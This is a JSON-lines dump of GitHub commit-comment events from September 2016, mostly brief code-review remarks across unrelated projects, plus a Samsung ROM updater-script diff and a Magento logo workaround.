{"id":"4591862327","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19102405,"position":null,"line":null,"path":null,"commit_id":"21c5a51947a35cdba9bece35093b7dc32f621d1c","created_at":"2016-09-20T19:19:40Z","updated_at":"2016-09-20T19:19:40Z","body":"@Ilvec Thank you Ivan! I intend to go ahead with this effort anyway ;-)\n-- \nInviato dal mio dispositivo Android con K-9 Mail. Perdonate la brevità."}},"created_at":"2016-09-20T19:19:40Z"}
{"id":"4591863811","type":"CommitCommentEvent","actor":{"login":"YaqiWang"},"repo":{"name":"idaholab/moose"},"payload":{"comment":{"id":19102413,"position":15,"line":33,"path":"framework/src/base/ComputeJacobianThread.C","commit_id":"d1664146a4a9f03c125ecd0c2356ebebd0389058","created_at":"2016-09-20T19:19:56Z","updated_at":"2016-09-20T19:19:56Z","body":"same here."}},"created_at":"2016-09-20T19:19:56Z"}
{"id":"4591865828","type":"CommitCommentEvent","actor":{"login":"rsutormin"},"repo":{"name":"kbaseapps/FeatureValues"},"payload":{"comment":{"id":19102416,"position":53,"line":76,"path":"ui/narrative/methods/build_feature_set/display.yaml","commit_id":"3a3832b5e037a4e2351238b82addf15ec9fd393e","created_at":"2016-09-20T19:20:17Z","updated_at":"2016-09-20T19:20:17Z","body":"Hmm, I don't understand it either... @msneddon: Mike, do you remember who is author of it?"}},"created_at":"2016-09-20T19:20:17Z"}
{"id":"4591866064","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19102417,"position":null,"line":null,"path":null,"commit_id":"33292be60050185d98dcfc765c1d5972362ff6b9","created_at":"2016-09-20T19:20:20Z","updated_at":"2016-09-20T19:20:20Z","body":"ASIHP-validation1 (shenb) - x86_64-MacOS-10.9-clang: OK (2333 of 2333 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T19:20:20Z"}
{"id":"4591868564","type":"CommitCommentEvent","actor":{"login":"YaqiWang"},"repo":{"name":"idaholab/moose"},"payload":{"comment":{"id":19102422,"position":12,"line":28,"path":"framework/src/base/ComputeFullJacobianThread.C","commit_id":"d1664146a4a9f03c125ecd0c2356ebebd0389058","created_at":"2016-09-20T19:20:47Z","updated_at":"2016-09-20T19:20:47Z","body":"suggest to save nonlinear system into `_nl`."}},"created_at":"2016-09-20T19:20:47Z"}
{"id":"4591869751","type":"CommitCommentEvent","actor":{"login":"Maujor"},"repo":{"name":"railsgirlsmaceio/railsgirlsguides"},"payload":{"comment":{"id":19102427,"position":null,"line":null,"path":null,"commit_id":"0bb3d108f4e64bb7f108c31bd1b900dd6d4f753d","created_at":"2016-09-20T19:20:58Z","updated_at":"2016-09-20T19:20:58Z","body":"1-)\r\nO título: ***5* Finetune the routes**\r\nfoi traduzido para: ***5.* Acertos finais nos caminhos**\r\nÉ preciso rever se a tradução de **routes** para **caminhos** está de acordo com a terminologia Rails, não só no título como nos textos sob o título. \r\n  \r\n2-)\r\nSob o título **Outros Guias** é preciso ir traduzindo os títulos dos Guias à medida em que o tradutor traduzir cada título."}},"created_at":"2016-09-20T19:20:58Z"}
{"id":"4591873535","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19102439,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-20T19:21:36Z","updated_at":"2016-09-20T19:21:36Z","body":"Ok, i took a look at VZW updater script, RIL should work, all other variants should be fine too regarding RIL, i have only a doubt and is loki, if works then i think multi device support is fully fixed.. :) \r\n\r\nHere' s the diff between the fixed script and the VZW script:\r\n\r\nsymlink(\"/firmware-mdm/image/rpm.mbn\", \"/system/etc/firmware/rpm.mbn\");\r\n symlink(\"/firmware-mdm/image/sbl1.mbn\", \"/system/etc/firmware/sbl1.mbn\");\r\n symlink(\"/firmware-mdm/image/sbl2.mbn\", \"/system/etc/firmware/sbl2.mbn\");\r\n-symlink(\"/firmware/image/q6.b00\", \"/system/etc/firmware/q6.b00\");\r\n-symlink(\"/firmware/image/q6.b01\", \"/system/etc/firmware/q6.b01\");\r\n-symlink(\"/firmware/image/q6.b03\", \"/system/etc/firmware/q6.b03\");\r\n-symlink(\"/firmware/image/q6.b04\", \"/system/etc/firmware/q6.b04\");\r\n-symlink(\"/firmware/image/q6.b05\", \"/system/etc/firmware/q6.b05\");\r\n-symlink(\"/firmware/image/q6.b06\", \"/system/etc/firmware/q6.b06\");\r\n-symlink(\"/firmware/image/q6.mdt\", \"/system/etc/firmware/q6.mdt\");\r\n symlink(\"/firmware/image/tzapps.b00\", \"/system/etc/firmware/tzapps.b00\");\r\n symlink(\"/firmware/image/tzapps.b01\", \"/system/etc/firmware/tzapps.b01\");\r\n symlink(\"/firmware/image/tzapps.b02\", \"/system/etc/firmware/tzapps.b02\");\r\n symlink(\"/firmware/image/tzapps.b03\", \"/system/etc/firmware/tzapps.b03\");\r\n symlink(\"/firmware/image/tzapps.mdt\", \"/system/etc/firmware/tzapps.mdt\");\r\n-symlink(\"/firmware/image/vidc.b00\", \"/system/etc/firmware/vidc.b00\");\r\n-symlink(\"/firmware/image/vidc.b01\", \"/system/etc/firmware/vidc.b01\");\r\n-symlink(\"/firmware/image/vidc.b02\", \"/system/etc/firmware/vidc.b02\");\r\n-symlink(\"/firmware/image/vidc.b03\", \"/system/etc/firmware/vidc.b03\");\r\n-symlink(\"/firmware/image/vidc.mdt\", \"/system/etc/firmware/vidc.mdt\");\r\n symlink(\"/system/lib/libappfuse_jni.so\", \"/system/priv-app/MtpDocumentsProvider/lib/arm/libappfuse_jni.so\");\r\n symlink(\"/system/lib/libbluetooth_jni.so\", \"/system/app/Bluetooth/lib/arm/libbluetooth_jni.so\");\r\n symlink(\"/system/lib/libdefcontainer_jni.so\", \"/system/priv-app/DefaultContainerService/lib/arm/libdefcontainer_jni.so\");\r\n@@ -171,6 +159,7 @@ set_metadata(\"/system/bin/installd\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capab\r\n set_metadata(\"/system/bin/irsc_util\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:irsc_util_exec:s0\");\r\n set_metadata(\"/system/bin/iw\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:wcnss_service_exec:s0\");\r\n set_metadata(\"/system/bin/keystore\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:keystore_exec:s0\");\r\n+set_metadata(\"/system/bin/ks\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:mdm_helper_exec:s0\");\r\n set_metadata(\"/system/bin/lmkd\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:lmkd_exec:s0\");\r\n set_metadata(\"/system/bin/loc_launcher\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:location_exec:s0\");\r\n set_metadata(\"/system/bin/logcat\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:logcat_exec:s0\");\r\n@@ -188,12 +177,16 @@ set_metadata(\"/system/bin/mpdecision\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"cap\r\n set_metadata(\"/system/bin/mtpd\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:mtp_exec:s0\");\r\n set_metadata(\"/system/bin/ndc\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:wcnss_service_exec:s0\");\r\n set_metadata(\"/system/bin/netd\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:netd_exec:s0\");\r\n+set_metadata(\"/system/bin/netmgrd\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:netmgrd_exec:s0\");\r\n set_metadata(\"/system/bin/patchoat\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:dex2oat_exec:s0\");\r\n set_metadata(\"/system/bin/pppd\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:ppp_exec:s0\");\r\n set_metadata(\"/system/bin/profman\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:profman_exec:s0\");\r\n+set_metadata(\"/system/bin/qcks\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:mdm_helper_exec:s0\");\r\n+set_metadata(\"/system/bin/qmuxd\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:qmuxd_exec:s0\");\r\n set_metadata(\"/system/bin/qseecomd\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:tee_exec:s0\");\r\n set_metadata(\"/system/bin/racoon\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:racoon_exec:s0\");\r\n set_metadata(\"/system/bin/rild\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:rild_exec:s0\");\r\n+set_metadata(\"/system/bin/rmt_storage\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:rmt_storage_exec:s0\");\r\n set_metadata(\"/system/bin/run-as\", \"uid\", 0, \"gid\", 2000, \"mode\", 0750, \"capabilities\", 0xc0, \"selabel\", \"u:object_r:runas_exec:s0\");\r\n set_metadata(\"/system/bin/sdcard\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:sdcardd_exec:s0\");\r\n set_metadata(\"/system/bin/servicemanager\", \"uid\", 0, \"gid\", 2000, \"mode\", 0755, \"capabilities\", 0x0, \"selabel\", \"u:object_r:servicemanager_exec:s0\");\r\n\r\n\r\nExcept rmt_storage (see here: https://github.com/AOSP-JF-MM/proprietary_vendor_samsung/commit/cbdc59e39f70b62d9ab2770939992bd81a355936) other perms and context are correctly settled by this change, so RIL must work... if boots :)"}},"created_at":"2016-09-20T19:21:36Z"}
{"id":"4591875078","type":"CommitCommentEvent","actor":{"login":"YaqiWang"},"repo":{"name":"idaholab/moose"},"payload":{"comment":{"id":19102445,"position":17,"line":35,"path":"framework/src/base/ComputeResidualThread.C","commit_id":"d1664146a4a9f03c125ecd0c2356ebebd0389058","created_at":"2016-09-20T19:21:51Z","updated_at":"2016-09-20T19:21:51Z","body":"better rename `_sys` to `_nl` to be consistent with `FEProblem`."}},"created_at":"2016-09-20T19:21:51Z"}
{"id":"4591877375","type":"CommitCommentEvent","actor":{"login":"pwalsh"},"repo":{"name":"os-data/eu-structural-funds"},"payload":{"comment":{"id":19102447,"position":141,"line":141,"path":"plumbing/bootstrap.py","commit_id":"a2da73168c29aa4af5f59986de77993339f87a58","created_at":"2016-09-20T19:22:12Z","updated_at":"2016-09-20T19:22:12Z","body":"Dare I say use of `.format` would be more idiomatic? While `%` is not deprecated or anything, `.format` was introduced to replace it, and use of `format` would be more consistent with how most codebases are written at OKI.\r\n\r\nRead here for more opinions than mine.\r\nhttp://stackoverflow.com/questions/5082452/python-string-formatting-vs-format"}},"created_at":"2016-09-20T19:22:12Z"}
{"id":"4591877830","type":"CommitCommentEvent","actor":{"login":"flnative"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19102448,"position":null,"line":null,"path":null,"commit_id":"23103c03c527fe1ed3e1a3be691436818b7963fe","created_at":"2016-09-20T19:22:16Z","updated_at":"2016-09-20T19:22:16Z","body":"Chamath, as a quick fix.. just FTP the file to the correct path. Click on the missing logo image in the backend and it will open a new window/tab.. That is your path, or pub/media/email/logo/websites/( 2, 3 or etc.)  You will then see the image in the backend too and in your transactional emails. "}},"created_at":"2016-09-20T19:22:16Z"}
{"id":"4591881619","type":"CommitCommentEvent","actor":{"login":"smeroni68"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19102457,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-20T19:22:51Z","updated_at":"2016-09-20T19:22:51Z","body":"ahah... who live will discover!!"}},"created_at":"2016-09-20T19:22:51Z"}
{"id":"4591881763","type":"CommitCommentEvent","actor":{"login":"oblonski"},"repo":{"name":"graphhopper/jsprit"},"payload":{"comment":{"id":19102458,"position":59,"line":59,"path":"jsprit-core/src/main/java/com/graphhopper/jsprit/core/problem/constraint/MaxTimeInVehicleConstraint.java","commit_id":"42ae57d00b3c30c3cebe5451af08bffd061fb479","created_at":"2016-09-20T19:22:52Z","updated_at":"2016-09-20T19:22:52Z","body":"here I check whether the insertion of a new shipment/delivery satisfies its own max-in-vehicle constraint"}},"created_at":"2016-09-20T19:22:52Z"}
{"id":"4591883935","type":"CommitCommentEvent","actor":{"login":"oblonski"},"repo":{"name":"graphhopper/jsprit"},"payload":{"comment":{"id":19102463,"position":89,"line":89,"path":"jsprit-core/src/main/java/com/graphhopper/jsprit/core/problem/constraint/MaxTimeInVehicleConstraint.java","commit_id":"42ae57d00b3c30c3cebe5451af08bffd061fb479","created_at":"2016-09-20T19:23:13Z","updated_at":"2016-09-20T19:23:13Z","body":"here it is checked whether it violates any other constraint"}},"created_at":"2016-09-20T19:23:13Z"}
{"id":"4591885725","type":"CommitCommentEvent","actor":{"login":"TaranpreetSinghRayat"},"repo":{"name":"subodh712/Contact-Manager"},"payload":{"comment":{"id":19102470,"position":5,"line":33,"path":"app/src/main/java/com/example/subodh/conatctmanager/ContactsManager.java","commit_id":"6012a0d60f2de640de0bfc77bde5cea476fb2866","created_at":"2016-09-20T19:23:30Z","updated_at":"2016-09-20T19:23:30Z","body":"Oh yAA Check this Crap \r\nRead this shits its very long : https://developer.android.com/reference/android/content/ContentResolver.html\r\nTell me all summary and working in college if possible :)"}},"created_at":"2016-09-20T19:23:30Z"}
{"id":"4591886563","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19102471,"position":6,"line":33,"path":"src/math.vhdl","commit_id":"10eb07b7dd2e56a8fe88c75df39d57a4cb76c71a","created_at":"2016-09-20T19:23:37Z","updated_at":"2016-09-20T19:23:37Z","body":"I wouldn't like a function that may fail silently. Looking at GHDL it will say that `positive'high` is 2^31-1. However, it will correctly report `to_string(positive'high + 1)` as 2^32. On the other hand, assigning a variable of type `positive` the value `positive'high + 1` will cause overflow. So a range with an upper bound of `sqrt(positive'high)` seems reasonable. A simulator with capabilities beyond 32 bits will have the range scaled accordingly. If we want Python generated reference data to use the correct range for randomization and corner case testing it will have to \"ask\" the simulator what the range is. One way, which I have some concerns with, is to have an initial \"test case\" that will store `positive'high` on file such that the information becomes available to the Python stimuli generation."}},"created_at":"2016-09-20T19:23:37Z"}
{"id":"4591888027","type":"CommitCommentEvent","actor":{"login":"pwalsh"},"repo":{"name":"os-data/eu-structural-funds"},"payload":{"comment":{"id":19102477,"position":167,"line":167,"path":"plumbing/bootstrap.py","commit_id":"a2da73168c29aa4af5f59986de77993339f87a58","created_at":"2016-09-20T19:23:51Z","updated_at":"2016-09-20T19:23:51Z","body":"How could geocode `not` be, with the way you set the variable above?"}},"created_at":"2016-09-20T19:23:51Z"}
{"id":"4591890589","type":"CommitCommentEvent","actor":{"login":"oblonski"},"repo":{"name":"graphhopper/jsprit"},"payload":{"comment":{"id":19102486,"position":95,"line":95,"path":"jsprit-core/src/main/java/com/graphhopper/jsprit/core/problem/constraint/MaxTimeInVehicleConstraint.java","commit_id":"42ae57d00b3c30c3cebe5451af08bffd061fb479","created_at":"2016-09-20T19:24:19Z","updated_at":"2016-09-20T19:24:19Z","body":"for this I use precalculated states I calculated in UpdateMaxInVehicleTime "}},"created_at":"2016-09-20T19:24:19Z"}
{"id":"4591894036","type":"CommitCommentEvent","actor":{"login":"iainx"},"repo":{"name":"NuGet/NuGet.Build.Packaging"},"payload":{"comment":{"id":19102490,"position":null,"line":null,"path":null,"commit_id":"31d07dbe5f95c380a94b8fafa6d47fa0d5320a68","created_at":"2016-09-20T19:24:55Z","updated_at":"2016-09-20T19:24:55Z","body":"👍 "}},"created_at":"2016-09-20T19:24:55Z"}
{"id":"4591895774","type":"CommitCommentEvent","actor":{"login":"Sureshnalli"},"repo":{"name":"Sureshnalli/SDETTraining"},"payload":{"comment":{"id":19102494,"position":null,"line":null,"path":null,"commit_id":"2694f03265ee673e7f1d5112f6c0e31158d16004","created_at":"2016-09-20T19:25:13Z","updated_at":"2016-09-20T19:25:13Z","body":"This is test for GIT account"}},"created_at":"2016-09-20T19:25:13Z"}
{"id":"4591897704","type":"CommitCommentEvent","actor":{"login":"kzu"},"repo":{"name":"NuGet/NuGet.Build.Packaging"},"payload":{"comment":{"id":19102500,"position":null,"line":null,"path":null,"commit_id":"31d07dbe5f95c380a94b8fafa6d47fa0d5320a68","created_at":"2016-09-20T19:25:33Z","updated_at":"2016-09-20T19:25:33Z","body":"It's a bit Skynet-ish, but evokes the future nevertheless, so 👍 "}},"created_at":"2016-09-20T19:25:33Z"}
{"id":"4591898986","type":"CommitCommentEvent","actor":{"login":"paceholder"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19102502,"position":9,"line":65,"path":"src/FlowScene.cpp","commit_id":"9ebda26996a5a9a0b98f7b20abc06b58706df80b","created_at":"2016-09-20T19:25:47Z","updated_at":"2016-09-20T19:25:47Z","body":"Well, it is more about returning temporary objects from functions rather than particular shared/weak pointer stuff.\r\nHave a look, GCC 5.4 even does not compile this code:\r\n\r\n```\r\n#include <iostream>\r\n#include <string>\r\n\r\nstruct TestObject { int a; };\r\n\r\nTestObject\r\ncreateTestObject()\r\n{\r\n    return TestObject();\r\n}\r\n\r\nint main()\r\n{\r\n    TestObject & ref = createTestObject();  // <<< ERROR\r\n    \r\n    std::cout << ref.a << std::endl;\r\n    \r\n    return 0;\r\n}\r\n```\r\n\r\n*Error message*\r\n In function 'int main()':\r\n15:35: error: invalid initialization of non-const reference of type 'TestObject&' from an rvalue of type 'TestObject'\r\n "}},"created_at":"2016-09-20T19:25:47Z"}
{"id":"4591899591","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"NuGet/NuGet.Build.Packaging"},"payload":{"comment":{"id":19102505,"position":null,"line":null,"path":null,"commit_id":"31d07dbe5f95c380a94b8fafa6d47fa0d5320a68","created_at":"2016-09-20T19:25:53Z","updated_at":"2016-09-20T19:25:53Z","body":"👍 "}},"created_at":"2016-09-20T19:25:53Z"}
{"id":"4591902381","type":"CommitCommentEvent","actor":{"login":"oblonski"},"repo":{"name":"graphhopper/jsprit"},"payload":{"comment":{"id":19102507,"position":68,"line":68,"path":"jsprit-core/src/main/java/com/graphhopper/jsprit/core/algorithm/state/UpdateMaxTimeInVehicle.java","commit_id":"42ae57d00b3c30c3cebe5451af08bffd061fb479","created_at":"2016-09-20T19:26:22Z","updated_at":"2016-09-20T19:26:22Z","body":"this is the StateUpdate which was not as trivial as I actually thought. It runs throught the route from start to end memorizing individual slack times. Secondly, it runs from end to start, calculating latestStart with these individual slack times"}},"created_at":"2016-09-20T19:26:22Z"}
{"id":"4591903318","type":"CommitCommentEvent","actor":{"login":"sezal"},"repo":{"name":"damil/SQL-Abstract-More"},"payload":{"comment":{"id":19102509,"position":37,"line":753,"path":"t/01-sql_abstract_more.t","commit_id":"4e133e0ff74c57143af8da0bd20260711b3b4fcd","created_at":"2016-09-20T19:26:32Z","updated_at":"2016-09-20T19:26:32Z","body":"Dot is still hardcoded in https://github.com/damil/SQL-Abstract-More/commit/4e133e0ff74c57143af8da0bd20260711b3b4fcd#diff-5b000cb7bb21074c8ac18acf92d73e64L641\r\nTry to change name_sep to any other char to see wrong result."}},"created_at":"2016-09-20T19:26:32Z"}
{"id":"4591904099","type":"CommitCommentEvent","actor":{"login":"vancura"},"repo":{"name":"NuGet/NuGet.Build.Packaging"},"payload":{"comment":{"id":19102512,"position":null,"line":null,"path":null,"commit_id":"31d07dbe5f95c380a94b8fafa6d47fa0d5320a68","created_at":"2016-09-20T19:26:41Z","updated_at":"2016-09-20T19:26:41Z","body":"I love it. Maybe we could really make the logo based on this."}},"created_at":"2016-09-20T19:26:41Z"}
{"id":"4591905591","type":"CommitCommentEvent","actor":{"login":"victorgarciaaprea"},"repo":{"name":"NuGet/NuGet.Build.Packaging"},"payload":{"comment":{"id":19102517,"position":null,"line":null,"path":null,"commit_id":"31d07dbe5f95c380a94b8fafa6d47fa0d5320a68","created_at":"2016-09-20T19:26:59Z","updated_at":"2016-09-20T19:26:59Z","body":"WONDERFUL"}},"created_at":"2016-09-20T19:26:59Z"}
{"id":"4591906782","type":"CommitCommentEvent","actor":{"login":"deskfolio"},"repo":{"name":"NuGet/NuGet.Build.Packaging"},"payload":{"comment":{"id":19102524,"position":null,"line":null,"path":null,"commit_id":"31d07dbe5f95c380a94b8fafa6d47fa0d5320a68","created_at":"2016-09-20T19:27:13Z","updated_at":"2016-09-20T19:27:13Z","body":"The kerning between the E and the T is weird, but other than that it's just WONDERFUL!"}},"created_at":"2016-09-20T19:27:13Z"}
{"id":"4591907920","type":"CommitCommentEvent","actor":{"login":"Akarazeev"},"repo":{"name":"tulindanil/SyllabusBot"},"payload":{"comment":{"id":19102528,"position":null,"line":null,"path":null,"commit_id":"fdc6b75b9078d965e5b1eb35b07c2834d8ad35d2","created_at":"2016-09-20T19:27:26Z","updated_at":"2016-09-20T19:27:26Z","body":"It's interesting feature"}},"created_at":"2016-09-20T19:27:26Z"}
{"id":"4591911519","type":"CommitCommentEvent","actor":{"login":"yuyaaa"},"repo":{"name":"yuyaaa/hello_world"},"payload":{"comment":{"id":19102537,"position":5,"line":3,"path":"test.txt","commit_id":"1e85ddb608b915f1a3b22bce00205ce6388a2824","created_at":"2016-09-20T19:28:05Z","updated_at":"2016-09-20T19:28:05Z","body":"ここ違うよ！"}},"created_at":"2016-09-20T19:28:05Z"}
{"id":"4591913153","type":"CommitCommentEvent","actor":{"login":"kzu"},"repo":{"name":"NuGet/NuGet.Build.Packaging"},"payload":{"comment":{"id":19102540,"position":null,"line":null,"path":null,"commit_id":"31d07dbe5f95c380a94b8fafa6d47fa0d5320a68","created_at":"2016-09-20T19:28:22Z","updated_at":"2016-09-20T19:28:22Z","body":"@vancura you mean that wasn't already the logo we were supposed to shrink to 64px?? buuuuuuuu !"}},"created_at":"2016-09-20T19:28:22Z"}
{"id":"4591915160","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"robreczarek/test-stopwatch"},"payload":{"comment":{"id":19102549,"position":null,"line":null,"path":null,"commit_id":"4e0f33bbdbda28b57470ad529c72f15afc3703ff","created_at":"2016-09-20T19:28:42Z","updated_at":"2016-09-20T19:28:42Z","body":"🆗 "}},"created_at":"2016-09-20T19:28:42Z"}
{"id":"4591916248","type":"CommitCommentEvent","actor":{"login":"THEMVFFINMAN"},"repo":{"name":"THEMVFFINMAN/Python-Games"},"payload":{"comment":{"id":19102551,"position":null,"line":null,"path":null,"commit_id":"5f38bb4a34dbd1576c3c906f91d811fd6f1de3c4","created_at":"2016-09-20T19:28:54Z","updated_at":"2016-09-20T19:28:54Z","body":"Because the enemy AI still can't see the player planning large traps, I have to look at fixing that. My idea right now is to use flood fill again to determine which side the player is on. Whichever side's flood fill reaches the player first, the enemy AI will go the opposite way. I can even go into more rudimentary checks and just check if the user is to the left or right and go based off that but I think I'll do that only if flood fill fails. "}},"created_at":"2016-09-20T19:28:54Z"}
{"id":"4591917846","type":"CommitCommentEvent","actor":{"login":"bitstorm"},"repo":{"name":"wicketstuff/core"},"payload":{"comment":{"id":19102556,"position":null,"line":null,"path":null,"commit_id":"7572720aac129f034137eabded38c3f2f942c93d","created_at":"2016-09-20T19:29:10Z","updated_at":"2016-09-20T19:29:10Z","body":"Hi @martin-g ,\r\n\r\nI've noted that CI on Travis was always failing on test ProgressButtonTest. I also couldn't reproduce it on local machine but I suspect that the problem should be related to some synchronization problem (the test uses some concurrent logic). I hoped to restored CI skipping this test but I was wrong as other problems seem to affect Travis (missing maven dependencies, connection timeout, etc...). \r\n\r\nSorry for all the noise."}},"created_at":"2016-09-20T19:29:10Z"}
{"id":"4591918794","type":"CommitCommentEvent","actor":{"login":"romeof1980"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19102559,"position":null,"line":null,"path":null,"commit_id":"23103c03c527fe1ed3e1a3be691436818b7963fe","created_at":"2016-09-20T19:29:19Z","updated_at":"2016-09-20T19:29:19Z","body":"hi there,\r\nfor anyone that needs it somehow to work,\r\nhere's my workaround in the meantime a bugfix will be released:\r\n\r\nIMPORTANT: below I use my \"logo_email.png\" and my \"logo's path\": in order to verify yours, try to upload the transactional email logo (hence you know the logo's name) in Content->Design->Configuration->(edit Store view\")->Transactional email -> then hover on the Logo-image to visualize the \"logo's path\",\r\n\r\n1) MY LOGO IS STORED HERE: /html/pub/media/email/logo/default/  (check your own path)\r\nUNDER THE NAME: logo_email.png (check your own name)\r\nso:\r\nI created the missing folders inside /pub/media/\r\nso now I have /html/pub/media/email/logo/default/\r\nI uploaded there my logo with the name logo_email.png\r\n\r\nOVERWRITE THIS ONE TOO (used when you see the email in the browser?)\r\n/html/app/design/frontend/Smartwave/porto/Magento_Email/web/logo_email.png\r\n\r\n2) OVERWRITING THE LOGO IN THE en_US STATIC FOLDER: \r\n/html/pub/static/frontend/Smartwave/porto/en_US/Magento_Email/logo_email.png\r\n3) SAME HERE for the it_IT static folder:\r\n/html/pub/static/frontend/Smartwave/porto/it_IT/Magento_Email/logo_email.png\r\n4) DO THE SAME for other languages\r\n\r\nclear the cache (php bin/magento cache:flush)\r\n\r\nBE CAREFUL:\r\nthe above operation at point 2 need probably to be re-done any time you deploy or re-deploy the static content\r\nsame when you update Magento 2 or your themes/extensions (just check it out and see if the logo has changed)\r\n\r\nTHE BIG DIFFICULTY OF THIS WORKAROUND?\r\nif you have got multiple store (more website or store views):\r\nin this case you you have to go to through the above procedure for any view\r\n\r\nhope that can help who needs to put the store in production before the bugfix release\r\n\r\ncheers!"}},"created_at":"2016-09-20T19:29:19Z"}
{"id":"4591922956","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"NuGet/NuGet.Build.Packaging"},"payload":{"comment":{"id":19102575,"position":null,"line":null,"path":null,"commit_id":"31d07dbe5f95c380a94b8fafa6d47fa0d5320a68","created_at":"2016-09-20T19:30:04Z","updated_at":"2016-09-20T19:30:04Z","body":"![image](https://cloud.githubusercontent.com/assets/109974/18685685/c39ee790-7f81-11e6-97b3-456f4b32bcd8.png)\r\n\r\n64px it is"}},"created_at":"2016-09-20T19:30:04Z"}
{"id":"4591923451","type":"CommitCommentEvent","actor":{"login":"diraulo"},"repo":{"name":"CraftAcademy/ca_course"},"payload":{"comment":{"id":19102577,"position":null,"line":null,"path":null,"commit_id":"fbb2f1b8c22e71fd6b9959a2fdcbd9ee1bcc1d22","created_at":"2016-09-20T19:30:10Z","updated_at":"2016-09-20T19:30:10Z","body":"Fixes #70 "}},"created_at":"2016-09-20T19:30:10Z"}
{"id":"4591923512","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"scarletfog/neww"},"payload":{"comment":{"id":19102578,"position":27,"line":27,"path":"Gruntfile.js","commit_id":"9e9f6d693070959883711d8b6178df1e38432413","created_at":"2016-09-20T19:30:10Z","updated_at":"2016-09-20T19:30:10Z","body":"Watch nie wskazuje na dobre miejsce ;)"}},"created_at":"2016-09-20T19:30:10Z"}
{"id":"4591927770","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"scarletfog/neww"},"payload":{"comment":{"id":19102592,"position":null,"line":null,"path":null,"commit_id":"9e9f6d693070959883711d8b6178df1e38432413","created_at":"2016-09-20T19:30:50Z","updated_at":"2016-09-20T19:30:50Z","body":"Do projektu nie dołączaj plików, które generujesz :)\r\n\r\nDodaj `.gitignore` i wyklucz to co Ci jest niepotrzebne.\r\nAby usunąć te rzeczy z repo, usuń je na dysku, zrób commit i wyślij (będzie pisać, że file/folder jest deleted)\r\n\r\n\r\n"}},"created_at":"2016-09-20T19:30:50Z"}
